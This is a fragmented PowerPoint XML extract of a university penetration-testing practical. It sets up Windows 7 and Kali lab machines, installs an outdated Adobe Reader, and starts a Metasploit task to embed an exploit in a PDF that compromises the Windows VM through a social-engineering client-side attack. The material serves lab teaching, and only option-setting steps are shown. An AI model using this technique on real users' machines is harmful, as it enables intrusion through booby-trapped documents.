                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ISF </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-GB" altLang="en-US">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Year 3 (2020/21), Semester 5</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-GB" altLang="en-US" sz="4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103" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="1143000"/>
            <a:ext cx="10363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104" name="Picture 16" descr="School of I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7" y="4"/>
            <a:ext cx="30480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804446"/>
            <a:ext cx="1828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sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Practical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>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2400" b="0"/>
              <a:t>Task 1 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Setup your Windows Environment for Pen-Test</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="2400" b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96938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Step 1 – Download a copy Acrobat from “Class Materials” Week 2 Folder in Team) and install it in your Windows 7.0 VM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>	- You can login to Team using the web version and download the files into Windows 7.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>	- You can also copy the files to online store and download from there.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r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Step 2	Copy the downloaded file from the Download folder to the desktop …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0" y="3048000"/>
            <a:ext cx="12763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87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895350"/>
            <a:ext cx="8153400" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Step 3	Double click on the file to install Acrobat Reader.. fallow the default setting to complete the installation. Delete the downloaded file if you wish.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r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t> 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endParaRPr lang="en-SG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905001"/>
            <a:ext cx="6419850" cy="381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9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8153400" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Step 4	Download the pdf document from the same folder in “Class Materials”.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r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Step 5	Copy it to the desktop and retain a copy in the Download folder in Windows 7 VM. When the copy is corrupted in the course of testing, you can make the other  copy.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r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t> 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endParaRPr lang="en-SG" sz="2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447800"/>
            <a:ext cx="3031273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83" y="4038600"/>
            <a:ext cx="8667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2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895350"/>
            <a:ext cx="8153400" cy="5181600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>Step 6	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Right click on the pdf document to open the document using Acrobat Reader … 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r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t> </a:t>
            </a:r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endParaRPr lang="en-SG" sz="2000" ker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676400"/>
            <a:ext cx="365065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47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95350"/>
            <a:ext cx="8153400" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Step 7	Accept the agreement …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endParaRPr lang="en-SG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24000"/>
            <a:ext cx="5486400" cy="44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82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45076"/>
            <a:ext cx="8153400" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Step 8	Browse the document … this part proved that the adobe reader is installed properly and the document is not corrupted.  Close the file after checking.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endParaRPr lang="en-SG" sz="2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43947"/>
            <a:ext cx="5153025" cy="35621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30932" y="5788122"/>
            <a:ext cx="2464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b="1"/>
              <a:t>--- End of Task 1 ---</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3472260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362200" y="3048000"/>
            <a:ext cx="7772400" cy="1524000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>Task 2 – Start Kali Linux and Install Acrobat Reader </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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614230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988800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" b="0"/>
              <a:t>Task 2 – Start Kali Linux and Install Adobe Reader 9.0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066800"/>
            <a:ext cx="5334000" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG"/>
              <a:t>Step 1 – Start Kali Linux VM …. in your VMware  Workstation Player. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr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3E81B-0A19-4C2B-A97B-0B0CB0F0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1457325"/>
            <a:ext cx="5334000" cy="4400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6130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EB4D3-75FE-43A6-BECA-521095C2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ahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Note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9157D-26F4-45C1-AD12-5682A7DC3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265" indent="-342265"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You may skip this step because Kali 2021.1 comes with default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>pdf reader, "atril".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342265" indent="-342265"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This step is to ensure you can open the pdf document and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>it is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896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5257800" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Step 2	Download a copy of Acrobat Reader… version 8.1.7-1 seem to work better than any other version.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="1339850">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#cd Downloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="1339850">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>ftp://ftp.adobe.com/pub/adobe/reader/unix/8.x/8.1.7/enu/AdobeReader_enu-8.1.7-1.i386.deb</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="1339850">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>#ls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="1339850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endParaRPr lang="en-SG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519654-1DBB-450F-A4CC-9D112E08A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286000"/>
            <a:ext cx="2743200" cy="1472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05F793-0549-47E6-9ECE-5D0500976B66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7658100" y="3791065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To change to superuser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="711386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2400" b="0"/>
              <a:t>Client Side Attack exploits the weaknesses found in various applications that are commonly used (e.g. Acrobat Reader, WinRAR etc.) to penetrate into the target computer system or server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="2400" b="0"/>
              <a:t>The attacks rely on some form of social engineering technique to trick a user into believing that the file he/she downloaded or received is legitimate and is malware free and execute the file on his/her computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="2400" b="0"/>
              <a:t>Success is almost guaranteed regardless of the OS for this type of attack, and it works with the  host-based firewall switch on.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="2400" b="0"/>
              <a:t>The only difficulty is to determine the vulnerability in the application and to  write an exploit for penetrating into the system. </a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="674653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905000"/>
            <a:ext cx="6905625" cy="33242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400" y="5410200"/>
            <a:ext cx="8294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Note that the download will be in the /root directory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429000" y="2013856"/>
            <a:ext cx="9144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3429000" y="5105400"/>
            <a:ext cx="9144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4257358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98" y="1666875"/>
            <a:ext cx="7943850" cy="51911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0839" y="771463"/>
            <a:ext cx="11380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800" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" dirty="0"/>
              <a:t> not working, use your browser to download…take note of where the file downloaded to. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13602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867E772-75C2-4EC5-8864-52226236F5BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="990600"/>
            <a:ext cx="10363200" cy="5181600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>Step 3	Check the file has been download under /root directory</a:t>
            </a:r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0" indent="0" defTabSz="1339850">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>                AdobeReader_enu-8.1.7-1.i386.deb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="1339850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endParaRPr lang="en-SG" sz="2000" ker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95563"/>
            <a:ext cx="6822618" cy="9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42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5FBE15-0138-4776-A645-453BE6997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85" y="2410691"/>
            <a:ext cx="7086600" cy="276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5B6522-31CA-4535-90BE-F90300594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85" y="2863128"/>
            <a:ext cx="5334000" cy="2952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2046" y="881462"/>
            <a:ext cx="107295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6938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0"/>
              <a:t>Step 4	Follow the command lines below to install the package			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0"/>
              <a:t>command lines </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2245994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38200"/>
            <a:ext cx="11734800" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" dirty="0"/>
              <a:t>	apt install libxml2:i386 libcanberra-gtk-module:i386 gtk2-engines-murrine:i386 libatk-adaptor:i386</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG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41" y="2514600"/>
            <a:ext cx="118491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16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99" y="1676400"/>
            <a:ext cx="11020425" cy="3895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4024" y="838200"/>
            <a:ext cx="10825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800"/>
              <a:t>Enter the following command line to install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800" err="1"/>
              <a:t>gdebi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1800"/>
              <a:t> package installer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="626363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71" y="1219200"/>
            <a:ext cx="8153400" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Install the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" err="1"/>
              <a:t>AdobeReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t> package …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r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>		</a:t>
            </a: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endParaRPr lang="en-SG" sz="2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90712"/>
            <a:ext cx="12039600" cy="3076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21EA3C-4A7F-4753-80A7-EA931AC7F81D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485293" y="5200472"/>
            <a:ext cx="94737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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.fosslinux.com/1776/how-to-install-adobe-acrobat-reader-in-ubuntu-and-linux-mint.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="1200"/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09592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11201400" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Step 5	Download or copy a copy of pdf document as in Task 1 to test the reader and the downloaded document itself... In Kali Linux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r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>		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r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t> 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endParaRPr lang="en-SG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35F61-E69C-45EC-915D-0172B5B19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362200"/>
            <a:ext cx="61436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88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5181600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Step 6	Copy the pdf document to the desktop and retain a copy in the Download folder. When the copy is corrupted in the course of testing, you can make another copy.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r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>	Click on the document to open the document…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r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t> 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endParaRPr lang="en-SG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129339"/>
            <a:ext cx="37338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45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2400"/>
              <a:t>In case, the reader conflict with the default pdf reader.. Remove the default “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2400" err="1"/>
              <a:t>atril</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2400"/>
              <a:t>” reader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69" y="1865454"/>
            <a:ext cx="1111955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8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At the end of this practical, you will be able </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>To create an exploit for Acrobat Reader using Metasploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>To penetrate into Windows 7 (Enterprise Version with no service pack) via a vulnerability found in Acrobat Reader Version 9.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4105930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63932" y="5801977"/>
            <a:ext cx="2464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b="1"/>
              <a:t>--- End of Task 2 ---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/>
              <a:t>Reboot kali after the next command…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28800"/>
            <a:ext cx="10904141" cy="266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2A7CF9-4C1A-43AD-AF1F-FA333FB53795}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="895229" y="4876621"/>
            <a:ext cx="106191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https://dm116.github.io/2020/04/12/how-to-uninstall-software-on-kali-linux/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1925166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362200" y="3048000"/>
            <a:ext cx="7772400" cy="1524000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>Task 3 – Crate an Exploit Payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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04867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2400" b="0"/>
              <a:t>Task </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2400"/>
              <a:t>3 – Create an Exploit Payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="2400" b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96938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Step 1 – Start Kali Linux …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266BA-583C-40DE-A018-099B01C21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676400"/>
            <a:ext cx="1314450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5529EA-9F45-4E38-8C9E-0A36405F5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371600"/>
            <a:ext cx="44958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47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38100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01F21-7BB3-4452-A3C0-9871EA6592BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7772400" y="11430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Use “kali” as password.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3A4550-313F-472A-A18A-2B80581E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45" y="1000908"/>
            <a:ext cx="5538349" cy="512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24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895350"/>
            <a:ext cx="8153400" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Step 2	Use the following exploit …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endParaRPr lang="en-SG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FCB87-92D5-4B31-90C2-AB9AAFB03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54" y="1868828"/>
            <a:ext cx="10100614" cy="94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1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52500"/>
            <a:ext cx="8153400" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Step 3	Show the options that we can set for this exploit…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r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>	They may differ from your other peer groups as the OS maybe accidentally patched.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endParaRPr lang="en-SG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865CC-1159-4F0D-97FF-113D14281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79" y="1676401"/>
            <a:ext cx="11855724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86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224" y="914400"/>
            <a:ext cx="8153400" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Step 4	Set the path where the non-infected pdf document file is located.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r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>INFILENAME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r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>	They may differ from your other peer groups as the OS maybe accidentally patched.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endParaRPr lang="en-SG" sz="20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A084E1-0205-4CC5-8416-420E92B976A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1959392" y="2955247"/>
            <a:ext cx="3657600" cy="809625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10FB968-B8AD-4E0A-999D-D2E6846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5" y="3764872"/>
            <a:ext cx="11565321" cy="56335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5C033A2-C431-47A5-BC24-C367E4E3DF18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5514195" y="3332341"/>
            <a:ext cx="838200" cy="78105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EF23F-4473-4208-90B2-6922D0302A16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1458610" y="1581599"/>
            <a:ext cx="10574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set INFILENAME /home/kali/Desktop/penetration-testing-with-kali.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2683837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838200"/>
            <a:ext cx="8153400" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Step 5	Set the name of the output file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r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>	They may differ from your other peer groups as the OS maybe accidentally patched.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endParaRPr lang="en-SG" sz="20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93DC72-0DDF-4219-BBB5-D5665BE8600E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858000" y="1219200"/>
            <a:ext cx="990600" cy="10668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D925A-428D-4EFD-88DB-B616A2B97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91" y="1499491"/>
